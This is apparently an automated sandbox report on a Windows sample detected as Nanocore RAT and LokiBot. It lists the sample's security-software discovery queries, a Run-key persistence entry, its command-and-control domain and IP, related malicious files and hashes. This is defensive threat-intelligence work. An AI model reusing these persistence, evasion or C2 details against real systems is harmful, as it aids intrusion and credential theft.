Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

Code function: 1_2_00403C2E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00403C2E

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

0_2_00403640

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

Remote Access Functionality

Detected Nanocore Rat

Source: jqenyeo.exe, 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: jqenyeo.exe, 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	11 Native API	Boot or Logon Initialization Scripts	112 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	15 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Remote Access Software	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	141 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	21 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xeWd55M5Lb.exe	49%	Virustotal		Browse
xeWd55M5Lb.exe	49%	ReversingLabs	Win32.Trojan.LokiBot
xeWd55M5Lb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\jqenyeo.exe	23%	ReversingLabs	Win32.Trojan.Pwsx
C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	23%	ReversingLabs	Win32.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.ltqmdmdi.exe.400000.0.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
17.0.ltqmdmdi.exe.400000.2.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
3.0.jqenyeo.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1230484	Download File
3.0.jqenyeo.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1230484	Download File
17.2.ltqmdmdi.exe.400000.0.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
3.0.jqenyeo.exe.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.jqenyeo.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1230484	Download File
3.0.jqenyeo.exe.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.jqenyeo.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.jqenyeo.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1230484	Download File
3.0.jqenyeo.exe.400000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
3.0.jqenyeo.exe.400000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
17.0.ltqmdmdi.exe.400000.1.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
1.2.jqenyeo.exe.400000.0.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
3.0.jqenyeo.exe.400000.5.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
17.0.ltqmdmdi.exe.400000.0.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
stonecold.ddns.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stonecold.ddns.net	185.19.85.141	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stonecold.ddns.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	xeWd55M5Lb.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.19.85.141	stonecold.ddns.net	Switzerland		48971	DATAWIRE-ASCH	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	628188
Start date and time: 17/05/202212:11:27	2022-05-17 12:11:27 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xeWd55M5Lb (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/18@16/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 97.4% (good quality ratio 91%) Quality average: 82.9% Quality standard deviation: 28.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 47 Number of non-executed functions: 61
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.173, 20.54.89.106
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:12:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
12:12:53	API Interceptor	790x Sleep call for process: jqenyeo.exe modified
12:12:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
12:13:05	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.19.85.141	RFQ-04983-00.doc	Get hash	malicious	Browse
	Pricelist-MAY 2022.xlsx	Get hash	malicious	Browse
	Documento de recibo de DHL,pdf.exe	Get hash	malicious	Browse
	Documento de recibo de DHL,pdf.exe	Get hash	malicious	Browse
	q9or8b0xUp.exe	Get hash	malicious	Browse
	Delivery Schedule March 23.xlsx	Get hash	malicious	Browse
	KF2QdfL3od.exe	Get hash	malicious	Browse
	0bsas7EJ1u.exe	Get hash	malicious	Browse
	mKIxz8SpOI.exe	Get hash	malicious	Browse
	j9g3S1wsKr.exe	Get hash	malicious	Browse
	INDENT-88341.xlsx	Get hash	malicious	Browse
	PR # 1003693.xlsx	Get hash	malicious	Browse
	Urgent Purchase Order FEB22_76543.exe	Get hash	malicious	Browse
	PO#28-02-2022,pdf.exe	Get hash	malicious	Browse
	PO#24-02-2022,pdf.exe	Get hash	malicious	Browse
	Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exe	Get hash	malicious	Browse
	Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exe	Get hash	malicious	Browse
	Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exe	Get hash	malicious	Browse
	Skype.exe	Get hash	malicious	Browse
	#461432638.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
stonecold.ddns.net	Payslip_APR_2022.doc	Get hash	malicious	Browse	45.132.226.1
	RFQ-04983-00.doc	Get hash	malicious	Browse	185.19.85.141
	Pricelist-MAY 2022.xlsx	Get hash	malicious	Browse	185.19.85.141
	q9or8b0xUp.exe	Get hash	malicious	Browse	185.19.85.141
	Delivery Schedule March 23.xlsx	Get hash	malicious	Browse	185.19.85.141
	KF2QdfL3od.exe	Get hash	malicious	Browse	185.19.85.141
	Pricelist and Catalogue.doc	Get hash	malicious	Browse	197.210.55.14
	0bsas7EJ1u.exe	Get hash	malicious	Browse	185.19.85.141
	j9g3S1wsKr.exe	Get hash	malicious	Browse	185.19.85.141
	INDENT-88341.xlsx	Get hash	malicious	Browse	185.19.85.141
	PR # 1003693.xlsx	Get hash	malicious	Browse	185.19.85.141
	GRIMME RFQ-20188.xlsx	Get hash	malicious	Browse	185.244.31.132

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DATAWIRE-ASCH	ARRIVAL_NOTICE_BL_NO_607847370.pdf.vbs	Get hash	malicious	Browse	185.19.85.162
	bntnigger.arm	Get hash	malicious	Browse	185.19.84.192
	RFQ-04983-00.doc	Get hash	malicious	Browse	185.19.85.141
	doc_8646626921-81609948075.pdf.vbs	Get hash	malicious	Browse	185.19.85.162
	doc_65398086_4190362045539.pdf.vbs	Get hash	malicious	Browse	185.19.85.162
	hv1AggWX5O.exe	Get hash	malicious	Browse	185.19.85.172
	Remittance Advice.xls	Get hash	malicious	Browse	185.19.85.174
	8v2E2Qu0iMFG7kx.exe	Get hash	malicious	Browse	185.19.85.175
	P2DIWOtpLf.exe	Get hash	malicious	Browse	185.19.85.160
	U7Ncg7oAyC.exe	Get hash	malicious	Browse	185.19.85.160
	lg5wG9Xf5M.exe	Get hash	malicious	Browse	185.19.85.160
	5JbQqP8SDG.exe	Get hash	malicious	Browse	185.19.85.175
	attack.ps1	Get hash	malicious	Browse	185.19.85.174
	Protected Client.vbs	Get hash	malicious	Browse	185.19.85.174
	Protected Client.vbs	Get hash	malicious	Browse	185.19.85.174
	attack.ps1	Get hash	malicious	Browse	185.19.85.174
	Pricelist-MAY 2022.xlsx	Get hash	malicious	Browse	185.19.85.141
	24pzwqvOw8.exe	Get hash	malicious	Browse	185.19.85.175
	FTUthCr1fh.exe	Get hash	malicious	Browse	185.19.85.175
	Dq6Qlhi724.exe	Get hash	malicious	Browse	185.19.85.175

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Payslip_APR_2022.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Payslip_APR_2022.doc	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltqmdmdi.exe_b58c0ec6d77fd91917e203a247ad37012bab_08a210e2_11a9d774\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9183344636214174
Encrypted:	false
SSDEEP:	192:bA6tZ8m+F/of8h8vHlnr+MPiejw0Gq/u7saS274It9872:ppzf2Wlr+MDjl/u7saX4It9r
MD5:	203193D01FE8E6516E7DF6EB617F44FD
SHA1:	3F9D49932DB1E09686C6961B504BFFD2BDA94DA7
SHA-256:	0EAFF7194851F1B1D27E62E95EEEECBABB5A57A7A0F64753FED35D17C929EB2D
SHA-512:	E4BC90019A580D2E7FB2F9337010AC209A9BD95936369FDF3C132EE4B4B5EC9DDC14F057EAEB2B9F79D2D06219A6B705C304A883F49EF85C8D89E717D8474DAA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.8.3.9.0.6.5.2.0.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.8.3.9.3.9.0.2.0.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.9.f.0.a.2.b.-.4.8.6.0.-.4.2.6.3.-.a.d.e.0.-.4.e.5.c.c.5.5.b.e.4.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.5.3.1.6.2.a.-.9.f.0.6.-.4.a.0.d.-.8.6.d.6.-.4.6.5.4.a.8.f.6.3.b.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.q.m.d.m.d.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.3.c.-.0.0.0.1.-.0.0.1.d.-.9.3.2.a.-.5.f.2.3.2.2.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.0.2.e.2.a.8.9.2.2.a.5.f.b.2.0.f.d.a.0.9.3.d.4.e.0.8.4.4.3.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.e.5.4.f.b.e.0.b.5.6.a.2.4.3.c.f.d.c.3.b.a.0.1.e.c.0.b.5.d.7.d.0.2.5.2.b.a.e.!.l.t.q.m.d.m.d.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2./.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltqmdmdi.exe_b58c0ec6d77fd91917e203a247ad37012bab_08a210e2_1b19ab92\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9252964303133182
Encrypted:	false
SSDEEP:	192:TGhY8N+F/oQ8h8vHlnr+MPiejoP9q/u7saS274It9872:aaazQ2Wlr+MDjH/u7saX4It9r
MD5:	F72417D7A8D0642F8420D1CAA1E9A3CC
SHA1:	4D430B52AA4BA4360C2B4D3916AFFED7B40D7138
SHA-256:	3ABC4DE1B80BF36B9C4A97B0265EFF6D0B424C3EFB0A7F8720480751C09DA8FF
SHA-512:	FEE62465A46F8311B41D5EED87BB62AEF9629A28C34C950591C9E43C5DE257179C58D21BEB47C9A20705A99A270AB98D7B52A44940E14BA6A1836646AE5F8E00
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.8.3.8.1.9.5.4.4.9.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.8.3.8.4.2.0.4.4.7.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.9.a.4.d.9.a.-.6.8.e.e.-.4.9.a.7.-.a.f.3.7.-.f.b.d.c.f.4.8.9.9.8.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.7.6.4.1.7.3.-.5.2.c.4.-.4.3.a.a.-.8.4.5.6.-.2.7.0.1.7.8.a.f.9.8.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.q.m.d.m.d.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.8.-.0.0.0.1.-.0.0.1.d.-.c.7.b.0.-.6.7.1.d.2.2.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.0.2.e.2.a.8.9.2.2.a.5.f.b.2.0.f.d.a.0.9.3.d.4.e.0.8.4.4.3.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.e.5.4.f.b.e.0.b.5.6.a.2.4.3.c.f.d.c.3.b.a.0.1.e.c.0.b.5.d.7.d.0.2.5.2.b.a.e.!.l.t.q.m.d.m.d.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C21.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue May 17 19:13:03 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	41694
Entropy (8bit):	1.9443159663202554
Encrypted:	false
SSDEEP:	192:qgNFkO4rdiAyOc8a0J5R++ngovO5piqPdAPtuImTQHf:OrtcdMlg7fXPTQHf
MD5:	AD6D568F9AED7786309AB7E98F31FEA6
SHA1:	52820029DE26CD634AD7315E0436A725B350120F
SHA-256:	4738DDBA5DB5919604FFCE1B84F0ADC6416B050EB78359100E173F44974B1A5A
SHA-512:	7B5A0BA32E07FEF6524EBC77DC3F351B478D281FCF6CE104597D46D3EA2BE350D5E200947833E255A86E0F9B84320434B38E7A69E894C7F130E7B32C085C49EA
Malicious:	false
